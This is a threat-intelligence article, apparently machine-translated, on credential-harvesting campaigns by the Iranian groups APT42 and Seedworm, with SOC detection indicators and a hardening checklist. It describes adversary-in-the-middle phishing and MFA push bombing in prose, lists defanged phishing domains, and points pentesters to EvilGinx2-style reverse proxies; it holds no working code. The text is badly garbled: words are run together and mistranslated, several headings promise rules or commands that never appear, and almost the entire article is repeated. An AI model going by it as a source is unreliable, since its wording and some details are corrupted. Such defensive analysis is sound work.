In 2024, APT42hacked into the Trump campaign, pulled out internal documents andtried to merge them to journalists. Without a single maliciousinvestment. Neither EXE, no macro, nor PowerShell-dropper - puresocial engineering and interception of sessions. Seedworm(MuddyWater), according to public reports, allegedly sat in thenetworks of a number of American organizations with persistence, laidbefore the beginning of the military escalation in the region. TwoIranian APT, two different departments, one strategic goal: theaccounts of people making decisions.
The figuresconfirm the trend: CrowdStrike Global Threat Report 2025 - 75% ofincursions use valid accounting data. The IBM X-Force records anincrease in such attacks by 71% over the year. Iranian groups amongthose who form this trend.
Two mandates, onetarget: APT42 and Seedworm in Iranian cyber espionage
The confusionbetween the Iranian APT is a headache for analysts. APT42 andSeedworm work on different mandates with different kill chains, butare aimed at one result: access to other people's accounts andintelligence.
According toGoogle Cloud (Mandiant), APT42 attacks specific people - not at theplace of work, but by who they know what they khhow and communicatewith whom. The choice of victims reflects the intelligence needs ofIRGC-IO: monitoring of external threats to the Islamic Republic andsuppression of dissent. In 2024, DOJ indicted three individualsassociated with IRGC for cyber operations against election campaigns.The group continued to work.
Seedworm,according to CISA, is a division of MOIS with the confirmed role ofinitial private broker. According to public reports, Seedworm issupposed to build up the tools: RustyWater (Rust-based RAT) ismentioned, as well as the abuse of RMM-tools Syncro and PDQ Connectinstalled on networks by third-party IT integrators. That is,Seedworm comes through the software that your own contractor hassupplied.
For SOC-analyst,the difference in detection surface is fundamental. APT42 generates aminimum of artifacts on endpoints - activity goes to cloud logs andproxy. Seedworm leaves footprints on hosts: signed backdoors,persistence through the registry, DNS tunneling. Alerts from the twogroups come from different sources, and this requires differentdetection pipelines.
Kill chaincredential harvesting: from the first letter to compromising thecloud
Three clusters ofphishing infrastructure APT42 and adversary-in-the-middle
According to theGoogle Cloud report, APT42 uses three infrastructure clusters.Cluster A disguised as media and analytical centers - Tayposkovtingdomains like washinqtonpost[.]press. Fake brands The Washington Post,The Economist, The Jerusalem Post, Aspen Institute. The organizationsthemselves are not compromised - their names are used as a wrapper.Cluster B disguised as legitimate services: Dropbox, Google Meet,YouTube. Domains with a bunch of words through a hyphen(panel-live-check[.]online, review[.]modification-check[.]online)Phishing pages are placed on Google Sites, OneDrive, CloudflareWorkers – traffic is mixed with legitimate activity. Domainblocking is meaningless when the page lives on sites[.]google[.]com.Cluster C Sharpened under the generation of MFA push notifications(T1621, Credential Access)
All three clustersare united by one pattern: a legitimate first contact through email,WhatsApp or Telegram -> building trust for weeks -> phishinglink. The first messages are clean. Invitation to comment on thearticle. Proposal to speak at the conference. No anti-phishing willcatch this because there is nothing to catch. By MITRE AT&CK:Impersonation (T1684, Defense Evasion) at the stage of praport,Phishing for Information: Spearphishing Link (T1598.003,Reconnaissance) at the stage of data collection through trust,Spearphishing Link (T1566.002, Initial Access) at the stage ofdelivery of the final phishing reference.
Central APT42 -adversary-in-the-middle (AiTM), a mapping on Multi-FactorAuthentication Interception (T1111, Credential Access) The victimenters the login, password and TOTP code on the cloned page. Theinfrastructure of APT42 instantly relays data to the real service andintercepts session cookies (T1539, Steal Web Session Cookie) Forpentesters: one-in-one mechanics with EvilGinx2 or Modlishka -reverse proxy between the victim and a legitimate service. Thedifference is custom phishing whales APT42, regularly updated and notdetected by public signatures. According to Mandiant, AiTM through acloned site sometimes gave failures (the token has been decayed),after which the group switched to the MFA push bombing (T1621): theoperator initiates a real entrance, the victim approves the pushnotification. According to the Google Cloud report, the second methodworked successfully.
The only MFAcategory resistant to AiTM is FIDO2/passkeys. They arecryptographically pegged to domain origin: a phishing page onpanel-live-check[.]online physically can not get a response addressedto accounts.google.com. Everything else - TOTP, SMS, push -intercepted.
After the sessionintercepted: living off the cloud
After accessing,APT42 works exclusively through the built-in features of cloudservices. MITRE ATT&CK: Cloud Accounts (T1078.004, DefenseEvasion / Persistence), Remote Email Collection (T1114.002,Collection)
DocumentedBehavior (Mandiant, Google Cloud):
•Registration of your own MFA-aucerer on the victim's account -persistence without malovers
• Readingthe correspondence in Outlook, downloading documents from OneDriveand SharePoint
• Extiltingfiles on OneDrive account, disguised as the victim's account
• VPN andanonymizing source masking infrastructure
Not a singlemalicious file inside the cloud environment. EDR on the endpoint isuseless. All activity in cloud logs. If you don’t monitor the M365Unified Audit Log with the same attention as Windows Event Log,you’re blind to this attack.
Seedworm 2026
indoor, Fakeset and compromised legitimate hosts
Unlike APT42,Seedworm traditionally relies on malware. But the 2026 campaign showsthe movement towards a hybrid model with elements of anidentity-be-based attack and the abuse of cloud services.
According toBroadcom (Symantec), Seedworm is allegedly found on the networks of anumber of American organizations, including the financial sector,transport infrastructure and suppliers of the defense industry. Twobackdoors, the attribution of which requires independentverification:
Dindoor [requiresverification] - according to Broadcom, uses Deno runtime(JavaScript/TypeScript) to be executed. Presumably signed by the AmyCherne certificate. Interesting choice of rantime - Deno is stillrare in malware, and most EDRs do not know how to interpret itsbehavior.
Fakeset [requiresverification] - Python backdoor. Presumably signed with “AmyCherne” and “Donald Gay” certificates. According to Broadcom,the Donald Gay certificate was previously used to sign the malware,presumably linked to Seworm. Download - presumably from the serversof Backblaze.
Data extilting -via Rclone in Wasabi cloud storage:
Key signal:according to Broadcom, Seedworm was presumed to have access tonetworks before the start of military escalation in the region.Classic pre-positioning - compromised legitimate hosts, which inpeacetime look like a normal infrastructure and do not generateaerates. According to CloudSEK, the role of initial access brokermeans that Seedworm compromise can lead to the emergence of anothergrouping on the network later: Seedworm comes first and transmitsaccess.
For SOC, this is adirect consequence: the discovery of Seedworm artifacts on the hostis an occasion to look for traces of other Iranian groups in cloudlogs. One group is the entry point. The second may already be inside.
Detecting theidentity-based attacks of Iranian APT in SIEM
Cloud Logs:Correlation Rules for M365 and Azure AD
For APT42, themain detection surface is cloud logs. Three Critical Events:
Proxy logs,email-heads and Seedworm indicators
CharacteristicAPT42 patterns in proxy logs:
• POSTrequests for Google Sites from redirect to domains .top, .online,.site, .live
•URL-shortener n9[.]clwith redirection to domains of the speciesadmin-stable-right[.]top
• Appeals tothe Dropbox API to download PDF baits, followed by the transition toa phishing page
When analyzingemail headers (MXToolbox, Email Header Analyzer): Return-Path doesnot coincide with From - spoofing. X-Originating-IP indicates VPN /hosting, not the mail server of the sender. SPF/DKIM/DMARC can takeplace - APT42 uses legitimate mail services for the first contact,and this makes filtering the sender’s reputation useless.
For Seedworm -other indicators, on hosts:
• SignedBinary with certificates "Amy Cherne" or "Donald Gay"
•DNS-queries with high entropy subdomains (Mori backdoor,DNS-tunneling)
• TelegramBot API traffic from internal hosts (Small Sieve backdoor)
• InstallingSyncro or PDQ Connect without authorization
CheklikliThardening: credential harvesting without malovars
1.FIDO2/passkeys for all high-risk accounts. TOTP and push MFA do notprotect against AiTM - it's not a recommendation, it's a fact
2. ConditionalAccess in Azure AD: blocking inputs from atypical IP, Compliantdevice requirement
3. Alert onUser registered security infowith correction by IP and user agent
4. Audit ofOAuth registration apps weekly. Alert on new consent with scopeMail.Read/ Files.Read.All
5. Proxy rule:altrate to TLD .top, .online, .site, .livein conjunction with POST tologin forms
6. DMARC inmode rejectfor your own domain
7. BaselineMailItemsAccessed: normal mail reading for each user - without thisbaseline rule 2 does not work
8. Monitoringof URL-shortener (n9[.]cl, bit.ly) with redirect to phishing domains
9. ForSeedworm: an altrate for the installation of RMM-tools (Syncro, PDQConnect, AnyDesk) without an application in IT. Monitoring ofDNS-queries with high entropy subdomains
10. Subscribeto IOC feeds on the Iranian APT (MISP CIRCL, Google TAG, CISAalerts). Automatic enrichment of alerts
Po Verizon DBIR2025. 38% of leaks are related to stolen accounts, 36% start withphishing. Identity-based attack is the main vector. Iranian groupsshow how it works in practice - from the first letter to exfiltrationwithout a single artifact on the host.
The main problemis not in APT42 and not in Seedworm. The problem is in the detectionarchitecture of most SOCs. The monitoring is built around theendpoints and perimeter. EDR catches malware, NGFW filters traffic.But when the attacker comes in with a stolen session in the M365 andworks through the browser – neither the EDR nor the firewall willsee it. They will see the clouds. And they are monitored with muchless attention than Windows Event Log.
Median detectiontime for Mandiant M-Trends 2025 - 11 days. APT42 spends these days inthe victim’s cloud: reads mail, downloads documents fromSharePoint, registers its own MFA authenticizer. SOC looks at theendpoints and sees the silence.
The figuresconfirm the trend: CrowdStrike Global Threat Report 2025 - 75% ofincursions use valid accounting data. The IBM X-Force records anincrease in such attacks by 71% over the year. Iranian groups amongthose who form this trend.
Two mandates, onetarget: APT42 and Seedworm in Iranian cyber espionage
The confusionbetween the Iranian APT is a headache for analysts. APT42 andSeedworm work on different mandates with different kill chains, butare aimed at one result: access to other people's accounts andintelligence.
According toGoogle Cloud (Mandiant), APT42 attacks specific people - not at theplace of work, but by who they know what they khhow and communicatewith whom. The choice of victims reflects the intelligence needs ofIRGC-IO: monitoring of external threats to the Islamic Republic andsuppression of dissent. In 2024, DOJ indicted three individualsassociated with IRGC for cyber operations against election campaigns.The group continued to work.
Seedworm,according to CISA, is a division of MOIS with the confirmed role ofinitial private broker. According to public reports, Seedworm issupposed to build up the tools: RustyWater (Rust-based RAT) ismentioned, as well as the abuse of RMM-tools Syncro and PDQ Connectinstalled on networks by third-party IT integrators. That is,Seedworm comes through the software that your own contractor hassupplied.
For SOC-analyst,the difference in detection surface is fundamental. APT42 generates aminimum of artifacts on endpoints - activity goes to cloud logs andproxy. Seedworm leaves footprints on hosts: signed backdoors,persistence through the registry, DNS tunneling. Alerts from the twogroups come from different sources, and this requires differentdetection pipelines.
Kill chaincredential harvesting: from the first letter to compromising thecloud
Three clusters ofphishing infrastructure APT42 and adversary-in-the-middle
According to theGoogle Cloud report, APT42 uses three infrastructure clusters.Cluster A disguised as media and analytical centers - Tayposkovtingdomains like washinqtonpost[.]press. Fake brands The Washington Post,The Economist, The Jerusalem Post, Aspen Institute. The organizationsthemselves are not compromised - their names are used as a wrapper.Cluster B disguised as legitimate services: Dropbox, Google Meet,YouTube. Domains with a bunch of words through a hyphen(panel-live-check[.]online, review[.]modification-check[.]online)Phishing pages are placed on Google Sites, OneDrive, CloudflareWorkers – traffic is mixed with legitimate activity. Domainblocking is meaningless when the page lives on sites[.]google[.]com.Cluster C Sharpened under the generation of MFA push notifications(T1621, Credential Access)
All three clustersare united by one pattern: a legitimate first contact through email,WhatsApp or Telegram -> building trust for weeks -> phishinglink. The first messages are clean. Invitation to comment on thearticle. Proposal to speak at the conference. No anti-phishing willcatch this because there is nothing to catch. By MITRE AT&CK:Impersonation (T1684, Defense Evasion) at the stage of praport,Phishing for Information: Spearphishing Link (T1598.003,Reconnaissance) at the stage of data collection through trust,Spearphishing Link (T1566.002, Initial Access) at the stage ofdelivery of the final phishing reference.
Central APT42 -adversary-in-the-middle (AiTM), a mapping on Multi-FactorAuthentication Interception (T1111, Credential Access) The victimenters the login, password and TOTP code on the cloned page. Theinfrastructure of APT42 instantly relays data to the real service andintercepts session cookies (T1539, Steal Web Session Cookie) Forpentesters: one-in-one mechanics with EvilGinx2 or Modlishka -reverse proxy between the victim and a legitimate service. Thedifference is custom phishing whales APT42, regularly updated and notdetected by public signatures. According to Mandiant, AiTM through acloned site sometimes gave failures (the token has been decayed),after which the group switched to the MFA push bombing (T1621): theoperator initiates a real entrance, the victim approves the pushnotification. According to the Google Cloud report, the second methodworked successfully.
The only MFAcategory resistant to AiTM is FIDO2/passkeys. They arecryptographically pegged to domain origin: a phishing page onpanel-live-check[.]online physically can not get a response addressedto accounts.google.com. Everything else - TOTP, SMS, push -intercepted.
After the sessionintercepted: living off the cloud
After accessing,APT42 works exclusively through the built-in features of cloudservices. MITRE ATT&CK: Cloud Accounts (T1078.004, DefenseEvasion / Persistence), Remote Email Collection (T1114.002,Collection)
DocumentedBehavior (Mandiant, Google Cloud):
•Registration of your own MFA-aucerer on the victim's account -persistence without malovers
• Readingthe correspondence in Outlook, downloading documents from OneDriveand SharePoint
• Extiltingfiles on OneDrive account, disguised as the victim's account
• VPN andanonymizing source masking infrastructure
Not a singlemalicious file inside the cloud environment. EDR on the endpoint isuseless. All activity in cloud logs. If you don’t monitor the M365Unified Audit Log with the same attention as Windows Event Log,you’re blind to this attack.
Seedworm 2026
indoor, Fakeset and compromised legitimate hostsUnlike APT42,Seedworm traditionally relies on malware. But the 2026 campaign showsthe movement towards a hybrid model with elements of anidentity-be-based attack and the abuse of cloud services.
According toBroadcom (Symantec), Seedworm is allegedly found on the networks of anumber of American organizations, including the financial sector,transport infrastructure and suppliers of the defense industry. Twobackdoors, the attribution of which requires independentverification:
Dindoor [requiresverification] - according to Broadcom, uses Deno runtime(JavaScript/TypeScript) to be executed. Presumably signed by the AmyCherne certificate. Interesting choice of rantime - Deno is stillrare in malware, and most EDRs do not know how to interpret itsbehavior.
Fakeset [requiresverification] - Python backdoor. Presumably signed with “AmyCherne” and “Donald Gay” certificates. According to Broadcom,the Donald Gay certificate was previously used to sign the malware,presumably linked to Seworm. Download - presumably from the serversof Backblaze.
Data extilting -via Rclone in Wasabi cloud storage:
Key signal:according to Broadcom, Seedworm was presumed to have access tonetworks before the start of military escalation in the region.Classic pre-positioning - compromised legitimate hosts, which inpeacetime look like a normal infrastructure and do not generateaerates. According to CloudSEK, the role of initial access brokermeans that Seedworm compromise can lead to the emergence of anothergrouping on the network later: Seedworm comes first and transmitsaccess.
For SOC, this is adirect consequence: the discovery of Seedworm artifacts on the hostis an occasion to look for traces of other Iranian groups in cloudlogs. One group is the entry point. The second may already be inside.
Detecting theidentity-based attacks of Iranian APT in SIEM
Cloud Logs:Correlation Rules for M365 and Azure AD
For APT42, themain detection surface is cloud logs. Three Critical Events:
Proxy logs,email-heads and Seedworm indicators
CharacteristicAPT42 patterns in proxy logs:
• POSTrequests for Google Sites from redirect to domains .top, .online,.site, .live
•URL-shortener n9[.]clwith redirection to domains of the speciesadmin-stable-right[.]top
• Appeals tothe Dropbox API to download PDF baits, followed by the transition toa phishing page
When analyzingemail headers (MXToolbox, Email Header Analyzer): Return-Path doesnot coincide with From - spoofing. X-Originating-IP indicates VPN /hosting, not the mail server of the sender. SPF/DKIM/DMARC can takeplace - APT42 uses legitimate mail services for the first contact,and this makes filtering the sender’s reputation useless.
For Seedworm -other indicators, on hosts:
• SignedBinary with certificates "Amy Cherne" or "Donald Gay"
•DNS-queries with high entropy subdomains (Mori backdoor,DNS-tunneling)
• TelegramBot API traffic from internal hosts (Small Sieve backdoor)
• InstallingSyncro or PDQ Connect without authorization
CheklikliThardening: credential harvesting without malovars
1.FIDO2/passkeys for all high-risk accounts. TOTP and push MFA do notprotect against AiTM - it's not a recommendation, it's a fact
2. ConditionalAccess in Azure AD: blocking inputs from atypical IP, Compliantdevice requirement
3. Alert onUser registered security infowith correction by IP and user agent
4. Audit ofOAuth registration apps weekly. Alert on new consent with scopeMail.Read/ Files.Read.All
5. Proxy rule:altrate to TLD .top, .online, .site, .livein conjunction with POST tologin forms
6. DMARC inmode rejectfor your own domain
7. BaselineMailItemsAccessed: normal mail reading for each user - without thisbaseline rule 2 does not work
8. Monitoringof URL-shortener (n9[.]cl, bit.ly) with redirect to phishing domains
9. ForSeedworm: an altrate for the installation of RMM-tools (Syncro, PDQConnect, AnyDesk) without an application in IT. Monitoring ofDNS-queries with high entropy subdomains
10. Subscribeto IOC feeds on the Iranian APT (MISP CIRCL, Google TAG, CISAalerts). Automatic enrichment of alerts
Po Verizon DBIR2025. 38% of leaks are related to stolen accounts, 36% start withphishing. Identity-based attack is the main vector. Iranian groupsshow how it works in practice - from the first letter to exfiltrationwithout a single artifact on the host.
The main problemis not in APT42 and not in Seedworm. The problem is in the detectionarchitecture of most SOCs. The monitoring is built around theendpoints and perimeter. EDR catches malware, NGFW filters traffic.But when the attacker comes in with a stolen session in the M365 andworks through the browser – neither the EDR nor the firewall willsee it. They will see the clouds. And they are monitored with muchless attention than Windows Event Log.
Median detectiontime for Mandiant M-Trends 2025 - 11 days. APT42 spends these days inthe victim’s cloud: reads mail, downloads documents fromSharePoint, registers its own MFA authenticizer. SOC looks at theendpoints and sees the silence.